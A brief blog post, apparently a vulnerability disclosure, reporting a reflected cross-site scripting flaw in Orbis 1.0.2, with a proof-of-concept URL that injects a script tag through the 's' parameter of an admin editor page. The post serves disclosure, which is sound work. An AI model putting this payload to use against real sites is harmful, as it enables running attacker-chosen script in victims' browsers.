This site is soon to be deprecated by http://www.johnleitch.net

Monday, July 5, 2010

Orbis 1.0.2 Reflected XSS

An XSS vulnerability in Orbis 1.0.2 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/orbis/admin/editors/text/editor-body.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

3 comments: